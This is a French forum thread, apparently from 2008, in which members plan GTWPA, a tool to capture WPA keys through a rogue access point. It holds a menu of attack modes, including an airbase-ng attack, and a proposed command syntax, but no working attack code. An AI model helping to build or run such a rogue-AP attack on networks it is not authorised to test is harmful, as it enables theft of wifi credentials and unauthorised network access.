Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Il faudra que je fasse un petit script de test pour voir si les numéros de variables sont bien récupérées automatiquement. Le souci, c'est que je comptais faire plusieurs modes, par exemple

echo "--> 1 Installation de GTWPA"
echo "--> 2 Préparation de la Rogue AP"
echo "--> 3 Démarrage de la Rogue AP"
echo "--> 4 Vérification de la Rogue AP"
echo "--> 5 Attaque airbase-ng GTWPA"
echo "--> 6 Statistiques GTWPA"

Et chaque mode fera appel à des variables différentes, par exemple pour le mode 2 il nous faudra l'essid (qui sera récupéré dans le fichier essid.txt), mais pour le mode 6 il nous faudra d'autres variables en plus, comme le canal, l'interface...

Et une commande du type

gtwpa 6 Livebox-a1b2 wlan0 10

(mode, essid, interface, canal), ça serait bon? En fait, il faudrait que le premier argument soit le mode, et ensuite les variables propres à chaque mode.

Hors Ligne

#25 27-11-2008 08:29:27

Tite-Live
Membre Indétronable
Inscription : 30-06-2008
Messages : 169

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

M1ck3y a écrit :

Et une commande du type

gtwpa 6 Livebox-a1b2 wlan0 10

(mode, essid, interface, canal), ça serait bon? En fait, il faudrait que le premier argument soit le mode, et ensuite les variables propres à chaque mode.

Eh bien... une commande de ce type, ça serait parfait big_smile


V.I.S.T.A. : Virus, Infections, Spyware, Trojans, Adware.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2100 28-11-2016 19:42:10 par koala
35 1713 23-11-2016 16:31:33 par roofnat
16 1031 17-11-2016 12:22:00 par disquette
10 414 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 443 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]